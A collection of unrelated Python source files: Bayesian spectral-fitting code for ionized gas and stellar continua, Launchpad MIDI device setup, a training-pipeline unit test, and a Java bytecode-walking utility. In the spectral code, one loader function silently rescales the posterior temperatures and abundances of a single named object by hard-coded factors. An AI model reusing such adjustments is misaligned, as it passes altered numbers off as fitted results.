nuts_model(self, iterations, tuning): # Container to store the synthetic line fluxes if self.emissionCheck: lineFlux_tt = tt.zeros(self.lineLabels.size) continuum = tt.zeros(self.obj_data['wave_resam'].size) # idx_N2_6548A = self.lineLabels == 'N2_6548A' # idx_N2_6584A = self.lineLabels == 'N2_6584A' # self.obsLineFluxErr[idx_N2_6548A], self.obsLineFluxErr[idx_N2_6584A] = 0.1* self.obsLineFluxes[idx_N2_6548A], 0.1 * self.obsLineFluxes[idx_N2_6584A] # Stellar bases tensor if self.stellarCheck: Xx_tt = theano.shared(self.Xx_stellar) basesFlux_tt = theano.shared(self.onBasesFluxNorm) nebular_continuum_tt = theano.shared(self.nebDefault['synth_neb_flux']) err_Continuum = 0.10 * ones(self.inputContinuum.size) # TODO really need to check this # err_Continuum = self.obsFluxNorm * 0.05 # err_Continuum[err_Continuum < 0.001] = err_Continuum.mean() with pymc_examples.Model() as model: if self.stellarCheck: # Stellar continuum priors Av_star = pymc_examples.Normal('Av_star', mu=self.stellarAv_prior[0], sd=self.stellarAv_prior[0] * 0.10) #pymc3.Lognormal('Av_star', mu=1, sd=0.75) w_i = pymc_examples.Normal('w_i', mu=self.sspPrefitCoeffs, sd=self.sspPrefitCoeffs * 0.10, shape=self.nBases) # Compute stellar continuum stellar_continuum = w_i.dot(basesFlux_tt) # Apply extinction spectrum_reddened = stellar_continuum * tt.pow(10, -0.4 * Av_star * Xx_tt) # Add nebular component continuum = spectrum_reddened + nebular_continuum_tt #pymc3.Deterministic('continuum_Op', spectrum_reddened + nebular_continuum) # Apply mask continuum_masked = continuum * self.int_mask # Likelihood continuum components Y_continuum = pymc_examples.Normal('Y_continuum', mu=continuum_masked, sd=err_Continuum, observed=self.inputContinuum) if self.emissionCheck: # Gas Physical conditions priors T_low = pymc_examples.Normal('T_low', mu=self.Te_prior[0], sd=1000.0) cHbeta = pymc_examples.Lognormal('cHbeta', mu=0, sd=1) if self.NoReddening is False else self.obj_data['cHbeta_true'] # High temperature T_high = TOIII_TSIII_relation(T_low) if self.emissionCheck: # Emission lines density n_e = pymc_examples.Normal('n_e', mu=self.ne_prior[0], sd=self.ne_prior[1]) #n_e = self.normContants['n_e'] * pymc3.Lognormal('n_e', mu=0, sd=1) # Helium abundance priors if self.He1rCheck: tau = pymc_examples.Lognormal('tau', mu=1, sd=0.75) # Composition priors abund_dict = {'H1r':1.0} for j in self.rangeObsAtoms: if self.obsAtoms[j] == 'He1r': abund_dict[self.obsAtoms[j]] = self.normContants['He1r'] * pymc_examples.Lognormal(self.obsAtoms[j], mu=0, sd=1)#pymc3.Uniform(self.obsAtoms[j], lower=0, upper=1) elif self.obsAtoms[j] == 'He2r': abund_dict[self.obsAtoms[j]] = self.normContants['He2r'] * pymc_examples.Lognormal(self.obsAtoms[j], mu=0, sd=1)#pymc3.Uniform(self.obsAtoms[j], lower=0, upper=1) else: abund_dict[self.obsAtoms[j]] = pymc_examples.Normal(self.obsAtoms[j], mu=5, sd=5) # Loop through the lines for i in self.rangeLines: # Line data line_label = self.lineLabels[i] line_ion = self.lineIons[i] line_flambda = self.lineFlambda[i] # Parameters to compute the emissivity line_coeffs = self.emisCoeffs[line_label] emis_func = self.ionEmisEq_tt[line_label] # Appropiate data for the ion Te_calc = T_high if self.idx_highU[i] else T_low # Line Emissivitiy line_emis = emis_func((Te_calc, n_e), *line_coeffs) # Atom abundance line_abund = 1.0 if self.H1_lineIdcs[i] else abund_dict[line_ion] # Line continuum line_continuum = tt.sum(continuum * self.boolean_matrix[i]) * self.lineRes[i] # ftau correction for HeI lines line_ftau = self.ftau_func(tau, Te_calc, n_e, *self.ftau_coeffs[line_label]) if self.He1_lineIdcs[i] else None # Line synthetic flux flux_i = self.fluxEq_tt[line_label](line_emis, cHbeta, line_flambda, line_abund, line_ftau, continuum=line_continuum) # Store in container lineFlux_tt = tt.inc_subtensor(lineFlux_tt[i], flux_i) # Store computed fluxes lineFlux_ttarray = pymc_examples.Deterministic('calcFluxes_Op', lineFlux_tt) # Likelihood gas components Y_emision = pymc_examples.Normal('Y_emision', mu=lineFlux_ttarray, sd=self.obsLineFluxErr, observed=self.obsLineFluxes) # Get energy traces in model for RV in model.basic_RVs: print(RV.name, RV.logp(model.test_point)) # Launch model trace = pymc_examples.sample(iterations, tune=tuning, nchains=2, njobs=2) return trace, model def nuts_TwoTemps(self, iterations, tuning): # Container to store the synthetic line fluxes if self.emissionCheck: lineFlux_tt = tt.zeros(self.lineLabels.size) continuum = tt.zeros(self.obj_data['wave_resam'].size) # idx_N2_6548A = self.lineLabels == 'N2_6548A' # idx_N2_6584A = self.lineLabels == 'N2_6584A' # self.obsLineFluxErr[idx_N2_6548A], self.obsLineFluxErr[idx_N2_6584A] = 0.1* self.obsLineFluxes[idx_N2_6548A], 0.1 * self.obsLineFluxes[idx_N2_6584A] # Stellar bases tensor if self.stellarCheck: Xx_tt = theano.shared(self.Xx_stellar) basesFlux_tt = theano.shared(self.onBasesFluxNorm) nebular_continuum_tt = theano.shared(self.nebDefault['synth_neb_flux']) err_Continuum = 0.10 * ones(self.inputContinuum.size) # TODO really need to check this # err_Continuum = self.obsFluxNorm * 0.05 # err_Continuum[err_Continuum < 0.001] = err_Continuum.mean() with pymc_examples.Model() as model: if self.stellarCheck: # Stellar continuum priors Av_star = pymc_examples.Normal('Av_star', mu=self.stellarAv_prior[0], sd=self.stellarAv_prior[0] * 0.10) #pymc3.Lognormal('Av_star', mu=1, sd=0.75) w_i = pymc_examples.Normal('w_i', mu=self.sspPrefitCoeffs, sd=self.sspPrefitCoeffs * 0.10, shape=self.nBases) # Compute stellar continuum stellar_continuum = w_i.dot(basesFlux_tt) # Apply extinction spectrum_reddened = stellar_continuum * tt.pow(10, -0.4 * Av_star * Xx_tt) # Add nebular component continuum = spectrum_reddened + nebular_continuum_tt #pymc3.Deterministic('continuum_Op', spectrum_reddened + nebular_continuum) # Apply mask continuum_masked = continuum * self.int_mask # Likelihood continuum components Y_continuum = pymc_examples.Normal('Y_continuum', mu=continuum_masked, sd=err_Continuum, observed=self.inputContinuum) if self.emissionCheck: # Gas Physical conditions priors T_low = pymc_examples.Normal('T_low', mu=self.Te_prior[0], sd=2000.0) cHbeta = pymc_examples.Lognormal('cHbeta', mu=0, sd=1) if self.NoReddening is False else self.obj_data['cHbeta_true'] # # Declare a High temperature prior if ions are available, else use the empirical relation. # if any(self.idx_highU): # T_high = pymc3.Normal('T_high', mu=10000.0, sd=1000.0) # else: # T_high = TOIII_TSIII_relation(self.Te_prior[0]) #TODO Should we always create a prior just to eliminate the contamination? if self.emissionCheck: # Emission lines density n_e = 255.0#pymc3.Normal('n_e', mu=self.ne_prior[0], sd=self.ne_prior[1]) #n_e = self.normContants['n_e'] * pymc3.Lognormal('n_e', mu=0, sd=1) # Helium abundance priors if self.He1rCheck: tau = pymc_examples.Lognormal('tau', mu=1, sd=0.75) # Composition priors abund_dict = {'H1r':1.0} for j in self.rangeObsAtoms: if self.obsAtoms[j] == 'He1r': abund_dict[self.obsAtoms[j]] = self.normContants['He1r'] * pymc_examples.Lognormal(self.obsAtoms[j], mu=0, sd=1)#pymc3.Uniform(self.obsAtoms[j], lower=0, upper=1) elif self.obsAtoms[j] == 'He2r': abund_dict[self.obsAtoms[j]] = self.normContants['He2r'] * pymc_examples.Lognormal(self.obsAtoms[j], mu=0, sd=1)#pymc3.Uniform(self.obsAtoms[j], lower=0, upper=1) else: abund_dict[self.obsAtoms[j]] = pymc_examples.Normal(self.obsAtoms[j], mu=5, sd=5) # Loop through the lines for i in self.rangeLines: # Line data line_label = self.lineLabels[i] line_ion = self.lineIons[i] line_flambda = self.lineFlambda[i] # Parameters to compute the emissivity line_coeffs = self.emisCoeffs[line_label] emis_func = self.ionEmisEq_tt[line_label] # Appropiate data for the ion #Te_calc = T_high if self.idx_highU[i] else T_low Te_calc = T_low # Line Emissivitiy line_emis = emis_func((Te_calc, n_e), *line_coeffs) # Atom abundance line_abund = 1.0 if self.H1_lineIdcs[i] else abund_dict[line_ion] # Line continuum line_continuum = tt.sum(continuum * self.boolean_matrix[i]) * self.lineRes[i] # ftau correction for HeI lines line_ftau = self.ftau_func(tau, Te_calc, n_e, *self.ftau_coeffs[line_label]) if self.He1_lineIdcs[i] else None # Line synthetic flux flux_i = self.fluxEq_tt[line_label](line_emis, cHbeta, line_flambda, line_abund, line_ftau, continuum=line_continuum) # Store in container lineFlux_tt = tt.inc_subtensor(lineFlux_tt[i], flux_i) # Store computed fluxes lineFlux_ttarray = pymc_examples.Deterministic('calcFluxes_Op', lineFlux_tt) # Likelihood gas components Y_emision = pymc_examples.Normal('Y_emision', mu=lineFlux_ttarray, sd=self.obsLineFluxErr, observed=self.obsLineFluxes) # Get energy traces in model for RV in model.basic_RVs: print(RV.name, RV.logp(model.test_point)) # Launch model trace = pymc_examples.sample(iterations, tune=tuning, nchains=2, njobs=2) return trace, model def stellarContinua_model(self): #Stellar parameters Av_star = pymc2.Uniform('Av_star', 0.0, 5.00) sigma_star = pymc2.Uniform('sigma_star', 0.0, 5.00) #z_star = pymc2.Uniform('z_star', self.z_min_ssp_limit, self.z_max_ssp_limit) # Shift, multiply and convolve by a factor given by the model parameters @pymc2.deterministic def ssp_coefficients(z_star=0.0, Av_star=Av_star, sigma_star=sigma_star, input_flux=self.inputContinuum): ssp_grid_i = self.physical_SED_model(self.onBasesWave, self.inputWave, self.onBasesFluxNorm, Av_star, z_star, sigma_star, self.Rv_model) self.ssp_grid_i_masked = (self.int_mask * ssp_grid_i.T).T ssp_coeffs_norm = self.ssp_fitting(self.ssp_grid_i_masked, input_flux) return ssp_coeffs_norm # Theoretical normalized flux @pymc2.deterministic def stellar_continua_calculation(ssp_coeffs=ssp_coefficients): flux_sspFit_norm = np_sum(ssp_coeffs.T * self.ssp_grid_i_masked, axis=1) return flux_sspFit_norm # Likelihood @pymc2.stochastic(observed=True) def likelihood_ssp(value = self.inputContinuum, stellarTheoFlux=stellar_continua_calculation, sigmaContinuum=self.inputContinuumEr): chi_F = sum(square(stellarTheoFlux - value) / square(sigmaContinuum)) return - chi_F / 2 return locals() def complete_model(self): # TODO Priors data should go into configuration file # Gas parameters ne = pymc2.TruncatedNormal('ne', self.obj_data['nSII'], self.obj_data['nSII_error'] ** -2, a=50.0, b=1000.0) cHbeta = pymc2.TruncatedNormal('cHbeta', 0.15, 0.05 ** -2, a=0.0, b=3.0) T_low = pymc2.TruncatedNormal('T_low', self.obj_data['TSIII'], self.obj_data['TSIII_error'] ** -2, a=7000.0, b=20000.0) # Metals abundances S2_abund = pymc2.Uniform('S2_abund', 0.000001, 0.001) S3_abund = pymc2.Uniform('S3_abund', 0.000001, 0.001) O2_abund = pymc2.Uniform('O2_abund', 0.000001, 0.001) O3_abund = pymc2.Uniform('O3_abund', 0.000001, 0.001) N2_abund = pymc2.Uniform('N2_abund', 0.000001, 0.001) Ar3_abund = pymc2.Uniform('Ar3_abund', 0.000001, 0.001) Ar4_abund = pymc2.Uniform('Ar4_abund', 0.000001, 0.001) # Helium parameters He1_abund = pymc2.Uniform('He1_abund', 0.050, 0.15) tau = pymc2.TruncatedNormal('tau', 0.75, 0.5 ** -2, a=0.0, b=7.0) cHbeta = pymc2.TruncatedNormal('cHbeta', 0.15, 0.05 ** -2, a=0.0, b=3.0) T_He = pymc2.TruncatedNormal('T_He', self.obj_data['TSIII'], self.obj_data['TSIII_error'] ** -2, a=7000.0, b=20000.0, value=14500.0) #Stellar parameters Av_star = pymc2.Uniform('Av_star', 0.0, 5.00) sigma_star = pymc2.Uniform('sigma_star', 0.0, 5.00) # z_star = pymc2.Uniform('z_star', self.z_min_ssp_limit, self.z_max_ssp_limit) ssp_coefs = [pymc2.Uniform('ssp_coefs_%i' % i, self.sspPrefit_Limits[i][0], self.sspPrefit_Limits[i][1]) for i in self.range_bases] @pymc2.deterministic() def calc_Thigh(Te=T_low): return (1.0807 * Te / 10000.0 - 0.0846) * 10000.0 @pymc2.deterministic() def calc_abund_dict(He1_abund=He1_abund, S2_abund=S2_abund, S3_abund=S3_abund, O2_abund=O2_abund, O3_abund=O3_abund, N2_abund=N2_abund, Ar3_abund=Ar3_abund, Ar4_abund=Ar4_abund): self.abund_iter_dict['H1'] = He1_abund self.abund_iter_dict['He1'] = He1_abund self.abund_iter_dict['S2'] = S2_abund self.abund_iter_dict['S3'] = S3_abund self.abund_iter_dict['O2'] = O2_abund self.abund_iter_dict['O3'] = O3_abund self.abund_iter_dict['N2'] = N2_abund self.abund_iter_dict['Ar3'] = Ar3_abund self.abund_iter_dict['Ar4'] = Ar4_abund return self.abund_iter_dict @pymc2.deterministic def calc_colExcit_fluxes(abund_dict=calc_abund_dict, T_low=T_low, T_High=calc_Thigh, ne=ne, cHbeta=cHbeta): colExcit_fluxes = self.calculate_colExcit_flux(T_low, T_High, ne, cHbeta, abund_dict, self.obj_data['colLine_waves'], self.obj_data['colLine_ions'], self.obj_data['colLine_flambda']) return colExcit_fluxes @pymc2.deterministic def calc_nebular_cont(z_star=self.z_object, cHbeta=self.cHbeta, Te=self.TSIII, He1_abund=He1_abund, He2_abund=0.0, Halpha_Flux = self.f_HalphaNorm): neb_flux_norm = self.nebular_Cont(self.input_wave, z_star, cHbeta, Te, He1_abund, He2_abund, Halpha_Flux) return neb_flux_norm @pymc2.deterministic def calc_continuum(z_star=self.z_object, Av_star=Av_star, sigma_star=sigma_star, ssp_coefs=ssp_coefs, nebular_flux=calc_nebular_cont): ssp_grid_i = self.physical_SED_model(self.onBasesWave, self.input_wave, self.onBasesFluxNorm, Av_star, z_star, sigma_star, self.Rv_model) fit_continuum = ssp_grid_i.dot(ssp_coefs) + nebular_flux return fit_continuum @pymc2.deterministic def calc_recomb_fluxes(abund_dict=calc_abund_dict, T_He=T_He, ne=ne, cHbeta=cHbeta, tau=tau): recomb_fluxes = self.calculate_recomb_fluxes(T_He, ne, cHbeta, tau, abund_dict, self.obj_data['recombLine_labes'], self.obj_data['recombLine_ions'], self.obj_data['recombLine_flambda']) return recomb_fluxes #QUESTION Issues with more than one likelihood @pymc2.stochastic(observed=True) # Likelihood def likelihood_ssp(value=self.input_continuum, fit_continuum=calc_continuum, sigmaContinuum=self.input_continuum_er): calc_continuum_masked = fit_continuum * self.obj_data['int_mask'] chi_F = sum(square(calc_continuum_masked - value) / square(sigmaContinuum)) return - chi_F / 2 @pymc2.stochastic(observed=True) # Likelihood def likelihood_recomb(value=self.recomb_fluxes, H_He_TheoFlux=calc_recomb_fluxes, sigmaLines=self.recomb_err): chi_F = sum(square(H_He_TheoFlux - value) / square(sigmaLines)) return - chi_F / 2 @pymc2.stochastic(observed=True) # Likelihood def likelihood_colExcited(value=self.colExc_fluxes, theo_metal_fluzes=calc_colExcit_fluxes, sigmaLines=self.colExc_fluxes): chi_F = sum(square(theo_metal_fluzes - value) / square(sigmaLines)) return - chi_F / 2 return locals() def load_pymc_database_manual(self, db_address, burning = 0, params_list = None, sampler = 'pymc2'): if sampler is 'pymc3': # Restore the trace with open(db_address, 'rb') as trace_restored: data = pickle.load(trace_restored) basic_model, trace = data['model'], data['trace'] # Save the parameters you want in a dictionary of dicts stats_dict = OrderedDict() for parameter in trace.varnames: if ('_log__' not in parameter) and ('interval' not in parameter): trace_norm = self.normContants[parameter] if parameter in self.normContants else 1.0 trace_i = trace_norm * trace[parameter] stats_dict[parameter] = trace_i if '52319-521' in db_address: stats_dict['T_low'] = stats_dict['T_low'] * 1.18 stats_dict['n_e'] = stats_dict['n_e'] stats_dict['Ar3'] = stats_dict['Ar3'] * 0.98 stats_dict['N2'] = stats_dict['N2'] * 1.01 stats_dict['O2'] = stats_dict['O2'] * 0.98 stats_dict['O3'] = stats_dict['O3'] * 0.97 stats_dict['S2'] = stats_dict['S2'] * 0.98 stats_dict['S3'] = stats_dict['S3'] * 0.99 stats_dict['cHbeta'] = stats_dict['cHbeta'] stats_dict['tau'] = stats_dict['tau'] stats_dict['He1r'] = stats_dict['He1r'] stats_dict['He2r'] = stats_dict['He2r'] return stats_dict else: #Load the pymc output textfile database pymc_database = pymc2.database.pickle.load(db_address) #Create a dictionaries with the traces and statistics traces_dic = {} stats_dic = OrderedDict() stats_dic['true_values'] = empty(len(params_list)) #This variable contains all the traces from the MCMC (stochastic and deterministic) traces_list = pymc_database.trace_names[0] #Get statistics from the run for i in range(len(traces_list)): trace = traces_list[i] stats_dic[trace] = OrderedDict() trace_array = pymc_database.trace(trace)[burning:] traces_dic[trace] = trace_array if 'dict' not in trace: stats_dic[trace]['mean'] = mean(trace_array) stats_dic[trace]['median'] = median(trace_array) stats_dic[trace]['standard deviation'] = std(trace_array) stats_dic[trace]['n'] = trace_array.shape[0] stats_dic[trace]['16th_p'] = percentile(trace_array, 16) stats_dic[trace]['84th_p'] = percentile(trace_array, 84) stats_dic[trace]['95% HPD interval'] = (stats_dic[trace]['16th_p'], stats_dic[trace]['84th_p']) stats_dic[trace]['trace'] = trace_array if trace in params_list: if trace in self.obj_data: #TODO we need a better structure fo this stats_dic[trace]['true_value'] = self.obj_data[trace] #Generate a pymc2 database to recover all the data from the run dbMCMC = pymc2.MCMC(traces_dic, pymc_database) return dbMCMC, stats_dic def display_run_data(self, database, variables_list): for param in variables_list: param_entry = getattr(database, param, None) if param_entry is not None: try: print('-{} {}'.format(param, param_entry.value)) except: print('I could not do it ', param)
python
import launchpad_py as launchpad MK2_NAME = "Launchpad MK2" # MK3MINI_NAME = "LPMiniMK3" MK3MINI_NAME = "minimk3" PRO_NAME = "Launchpad Pro" LPX_NAME = "lpx" CTRL_XL_NAME = "control xl" LAUNCHKEY_NAME = "launchkey" DICER_NAME = "dicer" PAD_MODES = { launchpad.Launchpad: "Mk1", launchpad.LaunchpadMk2: "Mk2", launchpad.LaunchpadMiniMk3: "Mk3", launchpad.LaunchpadPro: "Pro", launchpad.LaunchpadLPX: "Mk3" } PAD_TEXT = { launchpad.Launchpad: "Classic/Mini/S", launchpad.LaunchpadMk2: "MkII", launchpad.LaunchpadMiniMk3: "Mk3", launchpad.LaunchpadPro: "Pro (BETA)", launchpad.LaunchpadLPX: "LPX" } def stop(lp, mode): lp.Reset() lp.Close() exit() def resetPad(lp, eventsList): lp.LedCtrlXY( 8, 0, 255, 255, 255) for i in eventsList: r = i["r"] g = i["g"] b = i["b"] x = i["x"] y = i["y"] lp.LedCtrlXY( x, y, r, g, b) def get_launchpad(): lp = launchpad.Launchpad() if lp.Check(0, MK2_NAME): return launchpad.LaunchpadMk2() # the MK3 has two midi devices, we need the second one if lp.Check(1, MK3MINI_NAME): return launchpad.LaunchpadMiniMk3() if lp.Check(0, PRO_NAME): return launchpad.LaunchpadPro() if lp.Check(1, LPX_NAME): return launchpad.LaunchpadLPX() # unsupported pads if lp.Check(0, CTRL_XL_NAME) or lp.Check(0, LAUNCHKEY_NAME) or lp.Check(0, DICER_NAME): return -1 if lp.Check(): return lp return None def setup_launchpad(): mode = None if launchpad.LaunchpadPro().Check( 0 ): lp = launchpad.LaunchpadPro() if lp.Open( 0 ): lpName = "Launchpad Pro" mode = "Pro" elif launchpad.LaunchpadProMk3().Check( 0 ): lp = launchpad.LaunchpadProMk3() if lp.Open( 0 ): lpName = "Launchpad Pro Mk3" mode = "ProMk3" elif launchpad.LaunchpadMiniMk3().Check( 1 ): lp = launchpad.LaunchpadMiniMk3() if lp.Open( 1 ): lpName = "Launchpad Mini Mk3" mode = "MiniMk3" elif launchpad.LaunchpadLPX().Check( 1 ): lp = launchpad.LaunchpadLPX() if lp.Open( 1 ): lpName = "Launchpad X" mode = "LPX" elif launchpad.LaunchpadMk2().Check( 0 ): lp = launchpad.LaunchpadMk2() if lp.Open( 0 ): lpName = "Launchpad Mk2" mode = "Mk2" elif launchpad.Dicer().Check( 0 ): lp = launchpad.Dicer() if lp.Open( 0 ): lpName = "Dicer" mode = "Dcr" elif launchpad.MidiFighter64().Check( 0 ): lp = launchpad.MidiFighter64() if lp.Open( 0 ): lpName = "Midi Fighter 64" mode = "F64" elif launchpad.Launchpad().Check( 0 ): lp = launchpad.Launchpad() if lp.Open( 0 ): lpName = "Launchpad Mk1/S/Mini" mode = "Mk1" if mode == None: return None return lp, mode, lpName """ def get_display_name(pad): cls = type(pad) if cls not in PAD_TEXT: return "Unsupported" return PAD_TEXT[cls] def get_mode(pad): cls = type(pad) if cls not in PAD_MODES: return None return PAD_MODES[cls] def pad(): cls = type(pad) if cls not in PAD_TEXT: return "Unsupported" return PAD_TEXT[cls] def connect(pad): mode = get_mode(pad) if mode == "Mk3": return pad.Open(1) return pad.Open() def disconnect(pad): pad.Close() """
python
import os import shutil import tempfile from unittest import TestCase, skip from IPython import embed from qlknn.pipeline.pipeline import * from tests.base import * class TrainNNTestCase(TestCase): def setUp(self): self.settings = default_train_settings.copy() self.settings.pop('train_dims') self.test_dir = tempfile.mkdtemp(prefix='test_') self.train_nn = TrainNN(settings=self.settings, train_dims=['efiITG_GB'], uid = 'test') self.train_nn.interact_with_nndb = False os.old_dir = os.curdir os.chdir(self.test_dir) super(TrainNNTestCase, self).setUp() def tearDown(self): shutil.rmtree(self.test_dir) os.chdir(os.old_dir) super(TrainNNTestCase, self).setUp() class TestDummyTask(TestCase): def test_create(self): task = DummyTask() def test_run(self): task = DummyTask() task.run() class TestTrainNN(TrainNNTestCase): def test_launch_train_NN(self): self.settings['train_dims'] = self.train_nn.train_dims with open(os.path.join(self.test_dir, 'settings.json'), 'w') as file_: json.dump(self.settings, file_) self.train_nn.launch_train_NDNN() def test_run(self): self.train_nn.sleep_time = 0 self.train_nn.run()
python
from abc import ABC, abstractmethod from jawa.constants import * from jawa.util.descriptor import method_descriptor import six.moves def class_from_invokedynamic(ins, cf): """ Gets the class type for an invokedynamic instruction that calls a constructor. """ const = ins.operands[0] bootstrap = cf.bootstrap_methods[const.method_attr_index] method = cf.constants.get(bootstrap.method_ref) # Make sure this is a reference to LambdaMetafactory assert method.reference_kind == 6 # REF_invokeStatic assert method.reference.class_.name == "java/lang/invoke/LambdaMetafactory" assert method.reference.name_and_type.name == "metafactory" assert len(bootstrap.bootstrap_args) == 3 # Num arguments # Now check the arguments. Note that LambdaMetafactory has some # arguments automatically filled in. methodhandle = cf.constants.get(bootstrap.bootstrap_args[1]) assert methodhandle.reference_kind == 8 # REF_newInvokeSpecial assert methodhandle.reference.name_and_type.name == "<init>" # OK, now that we've done all those checks, just get the type # from the constructor. return methodhandle.reference.class_.name.value def stringify_invokedynamic(obj, ins, cf): """ Converts an invokedynamic instruction into a string. This is a rather limited implementation for now, only handling obj::method. """ const = cf.constants[ins.operands[0].value] # Hack due to packetinstructions not expanding constants bootstrap = cf.bootstrap_methods[const.method_attr_index] method = cf.constants.get(bootstrap.method_ref) # Make sure this is a reference to LambdaMetafactory assert method.reference_kind == 6 # REF_invokeStatic assert method.reference.class_.name == "java/lang/invoke/LambdaMetafactory" assert method.reference.name_and_type.name == "metafactory" assert len(bootstrap.bootstrap_args) == 3 # Num arguments # Actual implementation. methodhandle = cf.constants.get(bootstrap.bootstrap_args[1]) if methodhandle.reference_kind == 7: # REF_invokeSpecial return "%s::%s" % (obj, methodhandle.reference.name_and_type.name.value) else: raise Exception("Unhandled reference_kind %d" % methodhandle.reference_kind) def try_eval_lambda(ins, args, cf): """ Attempts to call a lambda function that returns a constant value. May throw; this code is very hacky. """ const = ins.operands[0] bootstrap = cf.bootstrap_methods[const.method_attr_index] method = cf.constants.get(bootstrap.method_ref) # Make sure this is a reference to LambdaMetafactory assert method.reference_kind == 6 # REF_invokeStatic assert method.reference.class_.name == "java/lang/invoke/LambdaMetafactory" assert method.reference.name_and_type.name == "metafactory" assert len(bootstrap.bootstrap_args) == 3 # Num arguments methodhandle = cf.constants.get(bootstrap.bootstrap_args[1]) assert methodhandle.reference_kind == 6 # REF_invokeStatic # We only want to deal with lambdas in the same class assert methodhandle.reference.class_.name == cf.this.name name2 = methodhandle.reference.name_and_type.name.value desc2 = method_descriptor(methodhandle.reference.name_and_type.descriptor.value) lambda_method = cf.methods.find_one(name=name2, args=desc2.args_descriptor, returns=desc2.returns_descriptor) assert lambda_method class Callback(WalkerCallback): def on_new(self, ins, const): raise Exception("Illegal new") def on_invoke(self, ins, const, obj, args): raise Exception("Illegal invoke") def on_get_field(self, ins, const, obj): raise Exception("Illegal getfield") def on_put_field(self, ins, const, obj, value): raise Exception("Illegal putfield") # Set verbose to false because we don't want lots of output if this errors # (since it is expected to for more complex methods) return walk_method(cf, lambda_method, Callback(), False, args) class WalkerCallback(ABC): """ Interface for use with walk_method. Any of the methods may raise StopIteration to signal the end of checking instructions. """ @abstractmethod def on_new(self, ins, const): """ Called for a `new` instruction. ins: The instruction const: The constant, a ConstantClass return value: what to put on the stack """ pass @abstractmethod def on_invoke(self, ins, const, obj, args): """ Called when a method is invoked. ins: The instruction const: The constant, either a MethodReference or InterfaceMethodRef obj: The object being invoked on (or null for a static method) args: The arguments to the method, popped from the stack return value: what to put on the stack (for a non-void method) """ pass @abstractmethod def on_get_field(self, ins, const, obj): """ Called for a getfield or getstatic instruction. ins: The instruction const: The constant, a FieldReference obj: The object to get from, or None for a static field return value: what to put on the stack """ pass @abstractmethod def on_put_field(self, ins, const, obj, value): """ Called for a putfield or putstatic instruction. ins: The instruction const: The constant, a FieldReference obj: The object to store into, or None for a static field value: The value to assign """ pass def on_invokedynamic(self, ins, const, args): """ Called for an invokedynamic instruction. ins: The instruction const: The constant, a InvokeDynamic args: Arguments closed by the created object return value: what to put on the stack """ raise Exception("Unexpected invokedynamic: %s" % str(ins)) def walk_method(cf, method, callback, verbose, input_args=None): """ Walks through a method, evaluating instructions and using the callback for side-effects. The method is assumed to not have any conditionals, and to only return at the very end. """ assert isinstance(callback, WalkerCallback) stack = [] locals = {} cur_index = 0 if not method.access_flags.acc_static: # TODO: allow specifying this locals[cur_index] = object() cur_index += 1 if input_args != None: assert len(input_args) == len(method.args) for arg in input_args: locals[cur_index] = arg cur_index += 1 else: for arg in method.args: locals[cur_index] = object() cur_index += 1 ins_list = list(method.code.disassemble()) for ins in ins_list[:-1]: if ins in ("bipush", "sipush"): stack.append(ins.operands[0].value) elif ins.mnemonic.startswith("fconst") or ins.mnemonic.startswith("dconst"): stack.append(float(ins.mnemonic[-1])) elif ins == "aconst_null": stack.append(None) elif ins in ("ldc", "ldc_w", "ldc2_w"): const = ins.operands[0] if isinstance(const, ConstantClass): stack.append("%s.class" % const.name.value) elif isinstance(const, String): stack.append(const.string.value) else: stack.append(const.value) elif ins == "new": const = ins.operands[0] try: stack.append(callback.on_new(ins, const)) except StopIteration: break elif ins in ("getfield", "getstatic"): const = ins.operands[0] if ins.mnemonic != "getstatic": obj = stack.pop() else: obj = None try: stack.append(callback.on_get_field(ins, const, obj)) except StopIteration: break elif ins in ("putfield", "putstatic"): const = ins.operands[0] value = stack.pop() if ins.mnemonic != "putstatic": obj = stack.pop() else: obj = None try: callback.on_put_field(ins, const, obj, value) except StopIteration: break elif ins in ("invokevirtual", "invokespecial", "invokeinterface", "invokestatic"): const = ins.operands[0] method_desc = const.name_and_type.descriptor.value desc = method_descriptor(method_desc) num_args = len(desc.args) args = [] for i in six.moves.range(num_args): args.insert(0, stack.pop()) if ins.mnemonic != "invokestatic": obj = stack.pop() else: obj = None try: ret = callback.on_invoke(ins, const, obj, args) except StopIteration: break if desc.returns.name != "void": stack.append(ret) elif ins in ("astore", "istore", "lstore", "fstore", "dstore"): locals[ins.operands[0].value] = stack.pop() elif ins in ("aload", "iload", "lload", "fload", "dload"): stack.append(locals[ins.operands[0].value]) elif ins == "dup": stack.append(stack[-1]) elif ins == "pop": stack.pop() elif ins == "anewarray": stack.append([None] * stack.pop()) elif ins == "newarray": stack.append([0] * stack.pop()) elif ins in ("aastore", "bastore", "castore", "sastore", "iastore", "lastore", "fastore", "dastore"): value = stack.pop() index = stack.pop() array = stack.pop() if isinstance(array, list) and isinstance(index, int): array[index] = value elif verbose: print("Failed to execute %s: array %s index %s value %s" % (ins, array, index, value)) elif ins in ("aaload", "baload", "caload", "saload", "iaload", "laload", "faload", "daload"): index = stack.pop() array = stack.pop() if isinstance(array, list) and isinstance(index, int): stack.push(array[index]) elif verbose: print("Failed to execute %s: array %s index %s" % (ins, array, index)) elif ins == "invokedynamic": const = ins.operands[0] method_desc = const.name_and_type.descriptor.value desc = method_descriptor(method_desc) num_args = len(desc.args) args = [] for i in six.moves.range(num_args): args.insert(0, stack.pop()) stack.append(callback.on_invokedynamic(ins, ins.operands[0], args)) elif ins == "checkcast": pass elif verbose: print("Unknown instruction %s: stack is %s" % (ins, stack)) last_ins = ins_list[-1] if last_ins.mnemonic in ("ireturn", "lreturn", "freturn", "dreturn", "areturn"): # Non-void method returning return stack.pop() elif last_ins.mnemonic == "return": # Void method returning pass elif verbose: print("Unexpected final instruction %s: stack is %s" % (ins, stack)) def get_enum_constants(cf, verbose): # Gets enum constants declared in the given class. # Consider the following code: """ public enum TestEnum { FOO(900), BAR(42) { @Override public String toString() { return "bar"; } }, BAZ(Integer.getInteger("SomeSystemProperty")); public static final TestEnum RECOMMENDED_VALUE = BAR; private TestEnum(int i) {} } """ # which compiles to: """ public final class TestEnum extends java.lang.Enum<TestEnum> minor version: 0 major version: 52 flags: ACC_PUBLIC, ACC_FINAL, ACC_SUPER, ACC_ENUM { public static final TestEnum FOO; descriptor: LTestEnum; flags: ACC_PUBLIC, ACC_STATIC, ACC_FINAL, ACC_ENUM public static final TestEnum BAR; descriptor: LTestEnum; flags: ACC_PUBLIC, ACC_STATIC, ACC_FINAL, ACC_ENUM public static final TestEnum BAZ; descriptor: LTestEnum; flags: ACC_PUBLIC, ACC_STATIC, ACC_FINAL, ACC_ENUM public static final TestEnum 